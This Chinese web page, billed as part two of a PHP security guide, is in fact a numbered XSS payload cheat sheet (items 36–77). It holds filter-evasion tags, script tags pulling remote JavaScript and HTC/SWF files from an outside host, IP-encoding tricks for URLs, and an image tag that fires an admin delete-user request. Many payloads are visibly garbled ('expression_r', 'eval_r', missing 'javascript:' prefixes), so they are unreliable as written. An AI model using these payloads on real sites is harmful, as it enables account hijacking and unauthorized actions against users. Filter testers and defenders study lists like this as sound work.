《PHP安全防范之XSS跨站示例大全(2)》要點:
本文介紹了PHP安全防范之XSS跨站示例大全(2),希望對您有用。如果有疑問,可以聯系我們。
相關主題:PHP安全
(36)BGSOUND
<BGSOUND SRC=”alert(‘XSS’);”>
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”alert(‘XSS’);”>
(38)遠程樣式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“alert(‘XSS’)”);}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=’msgbox(“XSS”)’></STYLE><UL><LI>XSS
(41)META鏈接url
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=alert(‘XSS’);”>
(42)Iframe
<IFRAME SRC=”alert(‘XSS’);”></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=”alert(‘XSS’);”></FRAMESET>
(44)Table
<TABLE BACKGROUND=”alert(‘XSS’)”>
(45)TD
<TABLE><TD BACKGROUND=”alert(‘XSS’)”>
(46)DIV background-image
<DIV STYLE=”background-image: url(alert(‘XSS’))”>
(47)DIV background-image后加上額外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=”background-image: url( alert(‘XSS’))”>
(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
(49)STYLE屬性分拆表達
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
(50)匿名STYLE(組成:開角號和一個字母開頭)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(“alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“alert(‘XSS’)”)}</STYLE>
(54)BASE
<BASE HREF=”alert(‘XSS’);//”>
(55)EMBED標簽,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
(56)在flash中使用ActionScrpt可以混進你XSS的代碼
a=”get”;
b=”URL(\”";
c=””;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必須和你的XSS載體在一臺服務器上
<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
</HTML>
(58)如果過濾了你的JS你可以在圖片里添加JS代碼來利用
<SCRIPT SRC=””></SCRIPT>
(59)IMG嵌入式命令,可執行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服務器)
/a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)繞符號過濾
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
(65)
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
(68)URL繞行
<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL編碼
<A HREF=”http://3w.org”>XSS</A>
(70)IP十進制
<A HREF=”http://3232235521″>XSS</A>
(71)IP十六進制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八進制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
(73)混合編碼
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>
(74)節省[http:]
<A HREF=”//www.snjht.com/”>XSS</A>
(75)節省[www]
<A HREF=”http://vephp.com/”>XSS</A>
(76)絕對點絕對DNS
<A HREF=”http://www.snjht.com./”>XSS</A>
(77)javascript鏈接
<A HREF=”document.location=’http://www.snjht.com/’”>XSS</A>
轉載請注明本頁網址:
http://www.snjht.com/jiaocheng/98_2.html